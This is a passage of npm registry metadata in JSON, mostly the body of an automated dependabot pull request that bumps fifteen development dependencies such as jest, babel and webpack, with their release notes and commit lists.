Z","updated_at":"2022-11-10T11:25:48.555Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/hiroppy/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5006531,"maintainers_count":1012930,"namespaces_count":295512,"keywords_count":700181,"github":"npm","metadata":{"funded_packages_count":150239},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2025-06-06T05:58:05.971Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},"unique_repositories_count":7920,"unique_repositories_count_past_30_days":149,"recent_issues":[{"uuid":"4584423931","node_id":"PR_kwDOEYdz-s7idKop","number":2574,"state":"open","title":"Bump the devdependenciesminor group across 1 directory with 15 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-06-03T23:29:48.000Z","updated_at":"2026-06-03T23:29:55.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"devdependenciesminor","update_count":15,"packages":[{"name":"@changesets/cli","old_version":"2.30.0","new_version":"2.31.0","repository_url":"https://github.com/changesets/changesets"},{"name":"globals","old_version":"17.5.0","new_version":"17.6.0","repository_url":"https://github.com/sindresorhus/globals"},{"name":"jest","old_version":"30.3.0","new_version":"30.4.2","repository_url":"https://github.com/jestjs/jest"},{"name":"jest-environment-jsdom","old_version":"30.3.0","new_version":"30.4.1","repository_url":"https://github.com/jestjs/jest"},{"name":"ts-jest","old_version":"29.4.9","new_version":"29.4.11","repository_url":"https://github.com/kulshekhar/ts-jest"},{"name":"tsc-alias","old_version":"1.8.16","new_version":"1.8.17","repository_url":"https://github.com/justkey007/tsc-alias"},{"name":"@babel/core","old_version":"7.29.0","new_version":"7.29.7","repository_url":"https://github.com/babel/babel"},{"name":"@babel/plugin-transform-runtime","old_version":"7.29.0","new_version":"7.29.7","repository_url":"https://github.com/babel/babel"},{"name":"@babel/preset-env","old_version":"7.29.5","new_version":"7.29.7","repository_url":"https://github.com/babel/babel"},{"name":"babel-jest","old_version":"30.3.0","new_version":"30.4.1","repository_url":"https://github.com/jestjs/jest"},{"name":"terser-webpack-plugin","old_version":"5.4.0","new_version":"5.6.0","repository_url":"https://github.com/webpack/minimizer-webpack-plugin"},{"name":"ts-loader","old_version":"9.5.4","new_version":"9.5.7","repository_url":"https://github.com/TypeStrong/ts-loader"},{"name":"webpack","old_version":"5.106.1","new_version":"5.107.0","repository_url":"https://github.com/webpack/webpack"},{"name":"webpack-cli","old_version":"7.0.2","new_version":"7.0.3","repository_url":"https://github.com/webpack/webpack-cli"},{"name":"webpack-dev-server","old_version":"5.2.3","new_version":"5.2.4","repository_url":"https://github.com/webpack/webpack-dev-server"}],"path":null,"ecosystem":"npm"},"body":"Bumps the devdependenciesminor group with 15 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [@changesets/cli](https://github.com/changesets/changesets) | `2.30.0` | `2.31.0` |\n| [globals](https://github.com/sindresorhus/globals) | `17.5.0` | `17.6.0` |\n| [jest](https://github.com/jestjs/jest/tree/HEAD/packages/jest) | `30.3.0` | `30.4.2` |\n| [jest-environment-jsdom](https://github.com/jestjs/jest/tree/HEAD/packages/jest-environment-jsdom) | `30.3.0` | `30.4.1` |\n| [ts-jest](https://github.com/kulshekhar/ts-jest) | `29.4.9` | `29.4.11` |\n| [tsc-alias](https://github.com/justkey007/tsc-alias) | `1.8.16` | `1.8.17` |\n| [@babel/core](https://github.com/babel/babel/tree/HEAD/packages/babel-core) | `7.29.0` | `7.29.7` |\n| [@babel/plugin-transform-runtime](https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-runtime) | `7.29.0` | `7.29.7` |\n| [@babel/preset-env](https://github.com/babel/babel/tree/HEAD/packages/babel-preset-env) | `7.29.5` | `7.29.7` |\n| [babel-jest](https://github.com/jestjs/jest/tree/HEAD/packages/babel-jest) | `30.3.0` | `30.4.1` |\n| [terser-webpack-plugin](https://github.com/webpack/minimizer-webpack-plugin) | `5.4.0` | `5.6.0` |\n| [ts-loader](https://github.com/TypeStrong/ts-loader) | `9.5.4` | `9.5.7` |\n| [webpack](https://github.com/webpack/webpack) | `5.106.1` | `5.107.0` |\n| [webpack-cli](https://github.com/webpack/webpack-cli) | `7.0.2` | `7.0.3` |\n| [webpack-dev-server](https://github.com/webpack/webpack-dev-server) | `5.2.3` | `5.2.4` |\n\n\nUpdates `@changesets/cli` from 2.30.0 to 2.31.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/changesets/changesets/releases\"\u003e@​changesets/cli's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ccode\u003e@​changesets/cli\u003c/code\u003e\u003ca href=\"https://github.com/2\"\u003e\u003ccode\u003e@​2\u003c/code\u003e\u003c/a\u003e.31.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/changesets/changesets/pull/1889\"\u003e#1889\u003c/a\u003e \u003ca href=\"https://github.com/changesets/changesets/commit/96ca062272605c14f77a64043f50a0a3a278c57f\"\u003e\u003ccode\u003e96ca062\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/mixelburg\"\u003e\u003ccode\u003e@​mixelburg\u003c/code\u003e\u003c/a\u003e! - Error on unsupported flags for individual CLI commands and print the matching command usage to make mistakes easier to spot.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/changesets/changesets/pull/1873\"\u003e#1873\u003c/a\u003e \u003ca href=\"https://github.com/changesets/changesets/commit/42943b74d7a455ed03b93dd85e1c0a15f45db37f\"\u003e\u003ccode\u003e42943b7\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/mixelburg\"\u003e\u003ccode\u003e@​mixelburg\u003c/code\u003e\u003c/a\u003e! - Respond to \u003ccode\u003e--help\u003c/code\u003e on all subcommands. Previously, \u003ccode\u003e--help\u003c/code\u003e was only handled when it was the sole argument; passing it alongside a subcommand (e.g. \u003ccode\u003echangeset version --help\u003c/code\u003e) would silently execute the command instead. Now \u003ccode\u003e--help\u003c/code\u003e always exits early and prints per-command usage when a known subcommand is provided, or the general help text otherwise.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/changesets/changesets/commit/d2121dc3d86b55f76de6022ccfcde843ed4b884a\"\u003e\u003ccode\u003ed2121dc\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e! - Fix npm auth for path-based registries during publish by preserving configured registry URLs instead of normalizing them.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/changesets/changesets/pull/1888\"\u003e#1888\u003c/a\u003e \u003ca href=\"https://github.com/changesets/changesets/commit/036fdd451367226d0f2cd8af1e0a7f37a65e3464\"\u003e\u003ccode\u003e036fdd4\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/mixelburg\"\u003e\u003ccode\u003e@​mixelburg\u003c/code\u003e\u003c/a\u003e! - Fix several \u003ccode\u003echangeset version\u003c/code\u003e issues with workspace protocol dependencies. Valid explicit \u003ccode\u003eworkspace:\u003c/code\u003e ranges and aliases are no longer rewritten unnecessarily, and workspace path references are handled correctly during versioning.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/changesets/changesets/pull/1903\"\u003e#1903\u003c/a\u003e \u003ca href=\"https://github.com/changesets/changesets/commit/5c4731fea82ce880500ac5e1c55ff372f7a4efe2\"\u003e\u003ccode\u003e5c4731f\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e! - Gracefully handle stale \u003ccode\u003enpm info\u003c/code\u003e data leading to duplicate publish attempts.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/changesets/changesets/pull/1867\"\u003e#1867\u003c/a\u003e \u003ca href=\"https://github.com/changesets/changesets/commit/f61e7166c349d4934e4acc9b47f3d028c212ecc1\"\u003e\u003ccode\u003ef61e716\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e! - Improved detection for \u003ccode\u003epublished\u003c/code\u003e state of prerelease-only packages without \u003ccode\u003elatest\u003c/code\u003e dist-tag on GitHub Packages registry.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eUpdated dependencies [\u003ca href=\"https://github.com/changesets/changesets/commit/036fdd451367226d0f2cd8af1e0a7f37a65e3464\"\u003e\u003ccode\u003e036fdd4\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/changesets/changesets/commit/036fdd451367226d0f2cd8af1e0a7f37a65e3464\"\u003e\u003ccode\u003e036fdd4\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/changesets/changesets/commit/036fdd451367226d0f2cd8af1e0a7f37a65e3464\"\u003e\u003ccode\u003e036fdd4\u003c/code\u003e\u003c/a\u003e]:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​changesets/assemble-release-plan\u003c/code\u003e\u003ca href=\"https://github.com/6\"\u003e\u003ccode\u003e@​6\u003c/code\u003e\u003c/a\u003e.0.10\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e@​changesets/get-dependents-graph\u003c/code\u003e\u003ca href=\"https://github.com/2\"\u003e\u003ccode\u003e@​2\u003c/code\u003e\u003c/a\u003e.1.4\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e@​changesets/apply-release-plan\u003c/code\u003e\u003ca href=\"https://github.com/7\"\u003e\u003ccode\u003e@​7\u003c/code\u003e\u003c/a\u003e.1.1\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e@​changesets/get-release-plan\u003c/code\u003e\u003ca href=\"https://github.com/4\"\u003e\u003ccode\u003e@​4\u003c/code\u003e\u003c/a\u003e.0.16\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e@​changesets/config\u003c/code\u003e\u003ca href=\"https://github.com/3\"\u003e\u003ccode\u003e@​3\u003c/code\u003e\u003c/a\u003e.1.4\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/changesets/changesets/commit/9cce6db18ddecbf7f9cded45254b9905b19a7516\"\u003e\u003ccode\u003e9cce6db\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://redirect.github.com/changesets/changesets/issues/1897\"\u003e#1897\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/changesets/changesets/commit/d2121dc3d86b55f76de6022ccfcde843ed4b884a\"\u003e\u003ccode\u003ed2121dc\u003c/code\u003e\u003c/a\u003e Fix npm auth for path-based registries during publish by preserving configure...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/changesets/changesets/commit/036fdd451367226d0f2cd8af1e0a7f37a65e3464\"\u003e\u003ccode\u003e036fdd4\u003c/code\u003e\u003c/a\u003e Fix several \u003ccode\u003echangeset version\u003c/code\u003e issues with workspace protocol dependencies (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/changesets/changesets/commit/5c4731fea82ce880500ac5e1c55ff372f7a4efe2\"\u003e\u003ccode\u003e5c4731f\u003c/code\u003e\u003c/a\u003e Gracefully handle stale \u003ccode\u003enpm info\u003c/code\u003e data leading to duplicate publish attempts...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/changesets/changesets/commit/96ca062272605c14f77a64043f50a0a3a278c57f\"\u003e\u003ccode\u003e96ca062\u003c/code\u003e\u003c/a\u003e Error on unsupported flags for individual CLI commands (\u003ca href=\"https://redirect.github.com/changesets/changesets/issues/1889\"\u003e#1889\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/changesets/changesets/commit/42943b74d7a455ed03b93dd85e1c0a15f45db37f\"\u003e\u003ccode\u003e42943b7\u003c/code\u003e\u003c/a\u003e fix(cli): respond to \u003ccode\u003e--help\u003c/code\u003e on all subcommands (\u003ca href=\"https://redirect.github.com/changesets/changesets/issues/1873\"\u003e#1873\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/changesets/changesets/commit/f61e7166c349d4934e4acc9b47f3d028c212ecc1\"\u003e\u003ccode\u003ef61e716\u003c/code\u003e\u003c/a\u003e Improved detection for \u003ccode\u003epublished\u003c/code\u003e state of prerelease-only packages without ...\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/changesets/changesets/compare/@changesets/cli@2.30.0...@changesets/cli@2.31.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `globals` from 17.5.0 to 17.6.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/sindresorhus/globals/releases\"\u003eglobals's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev17.6.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate globals (2026-05-01) (\u003ca href=\"https://redirect.github.com/sindresorhus/globals/issues/343\"\u003e#343\u003c/a\u003e)  00a4dd9\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/sindresorhus/globals/compare/v17.5.0...v17.6.0\"\u003ehttps://github.com/sindresorhus/globals/compare/v17.5.0...v17.6.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sindresorhus/globals/commit/6b15870f1c08b60b5b57afe45a703d9ed0be39bc\"\u003e\u003ccode\u003e6b15870\u003c/code\u003e\u003c/a\u003e 17.6.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sindresorhus/globals/commit/00a4dd9821830a9b044798120e86b1bb1a54648d\"\u003e\u003ccode\u003e00a4dd9\u003c/code\u003e\u003c/a\u003e Update globals (2026-05-01) (\u003ca href=\"https://redirect.github.com/sindresorhus/globals/issues/343\"\u003e#343\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/sindresorhus/globals/compare/v17.5.0...v17.6.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `jest` from 30.3.0 to 30.4.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jestjs/jest/releases\"\u003ejest's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev30.4.2\u003c/h2\u003e\n\u003ch1\u003eFixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Fix named imports from CJS modules whose \u003ccode\u003emodule.exports\u003c/code\u003e is a function with own-property exports (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16150\"\u003e#16150\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/jestjs/jest/compare/v30.4.1...v30.4.2\"\u003ehttps://github.com/jestjs/jest/compare/v30.4.1...v30.4.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev30.4.1\u003c/h2\u003e\n\u003ch2\u003eFeatures\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config, jest-core, jest-runner, jest-schemas, jest-types]\u003c/code\u003e Allow custom runner configuration options via tuple format \u003ccode\u003e['runner-path', {options}]\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16141\"\u003e#16141\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eFixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Align CJS-from-ESM default export with Node: \u003ccode\u003emodule.exports\u003c/code\u003e is always the ESM default, \u003ccode\u003e__esModule\u003c/code\u003e unwrapping is no longer applied (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16143\"\u003e#16143\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/jestjs/jest/compare/v30.4.0...v30.4.1\"\u003ehttps://github.com/jestjs/jest/compare/v30.4.0...v30.4.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev30.4.0\u003c/h2\u003e\n\u003cp\u003eBig release! 😀\u003c/p\u003e\n\u003cp\u003eMain feature is a rewrite of our custom runtime in preparation for stabilisation of native support of ESM. As part of that work \u003ccode\u003erequire(esm)\u003c/code\u003e module is now supported on Node 24.9+ (still requires \u003ccode\u003e--experimental-vm-modules\u003c/code\u003e like before).\u003c/p\u003e\n\u003cp\u003eIn addition we now support fake timers for the recently released \u003ccode\u003eTemporal\u003c/code\u003e API in Node v26.\u003c/p\u003e\n\u003cp\u003eReact 19 is also supported properly in \u003ccode\u003epretty-format\u003c/code\u003e, meaning snapshots of React components now work like they should.\u003c/p\u003e\n\u003cp\u003eDue to all the changes, there might be regressions that snuck in. Please report them!\u003c/p\u003e\n\u003cp\u003eFull list of changes below\u003c/p\u003e\n\u003ch2\u003eFeatures\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e[babel-jest]\u003c/code\u003e Support collecting coverage from \u003ccode\u003e.mts\u003c/code\u003e, \u003ccode\u003e.cts\u003c/code\u003e (and other) files (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/15994\"\u003e#15994\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-circus, jest-cli, jest-config, jest-core, jest-jasmine2, jest-types]\u003c/code\u003e Add \u003ccode\u003e--collect-tests\u003c/code\u003e flag to discover and list tests without executing them (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16006\"\u003e#16006\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config, jest-runner, jest-worker]\u003c/code\u003e Add \u003ccode\u003eworkerGracefulExitTimeout\u003c/code\u003e config option to control how long workers are given to exit before being force-killed (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/15984\"\u003e#15984\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config]\u003c/code\u003e Add support for \u003ccode\u003ejest.config.mts\u003c/code\u003e as a valid configuration file (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16005\"\u003e#16005\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config, jest-core, jest-reporters, jest-runner]\u003c/code\u003e \u003ccode\u003everbose\u003c/code\u003e and \u003ccode\u003esilent\u003c/code\u003e can now be set per-project; the project-level value overrides the global value for that project's tests (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16133\"\u003e#16133\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/fake-timers]\u003c/code\u003e Accept \u003ccode\u003eTemporal.Duration\u003c/code\u003e in \u003ccode\u003ejest.advanceTimersByTime()\u003c/code\u003e and \u003ccode\u003ejest.advanceTimersByTimeAsync()\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16128\"\u003e#16128\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/fake-timers]\u003c/code\u003e Accept \u003ccode\u003eTemporal.Instant\u003c/code\u003e and \u003ccode\u003eTemporal.ZonedDateTime\u003c/code\u003e in \u003ccode\u003ejest.setSystemTime()\u003c/code\u003e and \u003ccode\u003euseFakeTimers({now})\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16128\"\u003e#16128\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/fake-timers]\u003c/code\u003e Support faking \u003ccode\u003eTemporal.Now.*\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16131\"\u003e#16131\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-mock]\u003c/code\u003e Add \u003ccode\u003eclearMocksOnScope(scope)\u003c/code\u003e on \u003ccode\u003eModuleMocker\u003c/code\u003e for clearing every mock function exposed on a scope object (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16088\"\u003e#16088\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-resolve]\u003c/code\u003e Add \u003ccode\u003ecanResolveSync()\u003c/code\u003e on \u003ccode\u003eResolver\u003c/code\u003e so callers can detect when a user-configured resolver only exports an \u003ccode\u003easync\u003c/code\u003e hook (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16064\"\u003e#16064\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Use synchronous \u003ccode\u003eevaluate()\u003c/code\u003e for ES modules without top-level \u003ccode\u003eawait\u003c/code\u003e on Node versions that support it (v24.9+), and prefer the synchronous transform path when a sync transformer is configured (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16062\"\u003e#16062\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Support \u003ccode\u003erequire()\u003c/code\u003e of ES modules on Node v24.9+ (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16074\"\u003e#16074\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Validate TC39 import attributes (\u003ccode\u003ewith { type: 'json' }\u003c/code\u003e) on ESM imports (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16127\"\u003e#16127\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/transform]\u003c/code\u003e Add \u003ccode\u003ecanTransformSync(filename)\u003c/code\u003e on \u003ccode\u003eScriptTransformer\u003c/code\u003e so callers can pick the sync vs async transform path (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16062\"\u003e#16062\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-util]\u003c/code\u003e Add \u003ccode\u003eisError\u003c/code\u003e helper (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16076\"\u003e#16076\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jestjs/jest/blob/main/CHANGELOG.md\"\u003ejest's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e30.4.2\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Fix named imports from CJS modules whose \u003ccode\u003emodule.exports\u003c/code\u003e is a function with own-property exports (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16150\"\u003e#16150\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e30.4.1\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config, jest-core, jest-runner, jest-schemas, jest-types]\u003c/code\u003e Allow custom runner configuration options via tuple format \u003ccode\u003e['runner-path', {options}]\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16141\"\u003e#16141\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Align CJS-from-ESM default export with Node: \u003ccode\u003emodule.exports\u003c/code\u003e is always the ESM default, \u003ccode\u003e__esModule\u003c/code\u003e unwrapping is no longer applied (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16143\"\u003e#16143\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e30.4.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e[babel-jest]\u003c/code\u003e Support collecting coverage from \u003ccode\u003e.mts\u003c/code\u003e, \u003ccode\u003e.cts\u003c/code\u003e (and other) files (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/15994\"\u003e#15994\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-circus, jest-cli, jest-config, jest-core, jest-jasmine2, jest-types]\u003c/code\u003e Add \u003ccode\u003e--collect-tests\u003c/code\u003e flag to discover and list tests without executing them (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16006\"\u003e#16006\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config, jest-runner, jest-worker]\u003c/code\u003e Add \u003ccode\u003eworkerGracefulExitTimeout\u003c/code\u003e config option to control how long workers are given to exit before being force-killed (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/15984\"\u003e#15984\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config]\u003c/code\u003e Add support for \u003ccode\u003ejest.config.mts\u003c/code\u003e as a valid configuration file (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16005\"\u003e#16005\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config, jest-core, jest-reporters, jest-runner]\u003c/code\u003e \u003ccode\u003everbose\u003c/code\u003e and \u003ccode\u003esilent\u003c/code\u003e can now be set per-project; the project-level value overrides the global value for that project's tests (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16133\"\u003e#16133\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/fake-timers]\u003c/code\u003e Accept \u003ccode\u003eTemporal.Duration\u003c/code\u003e in \u003ccode\u003ejest.advanceTimersByTime()\u003c/code\u003e and \u003ccode\u003ejest.advanceTimersByTimeAsync()\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16128\"\u003e#16128\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/fake-timers]\u003c/code\u003e Accept \u003ccode\u003eTemporal.Instant\u003c/code\u003e and \u003ccode\u003eTemporal.ZonedDateTime\u003c/code\u003e in \u003ccode\u003ejest.setSystemTime()\u003c/code\u003e and \u003ccode\u003euseFakeTimers({now})\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16128\"\u003e#16128\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/fake-timers]\u003c/code\u003e Support faking \u003ccode\u003eTemporal.Now.*\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16131\"\u003e#16131\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-mock]\u003c/code\u003e Add \u003ccode\u003eclearMocksOnScope(scope)\u003c/code\u003e on \u003ccode\u003eModuleMocker\u003c/code\u003e for clearing every mock function exposed on a scope object (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16088\"\u003e#16088\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-resolve]\u003c/code\u003e Add \u003ccode\u003ecanResolveSync()\u003c/code\u003e on \u003ccode\u003eResolver\u003c/code\u003e so callers can detect when a user-configured resolver only exports an \u003ccode\u003easync\u003c/code\u003e hook (\u003ca 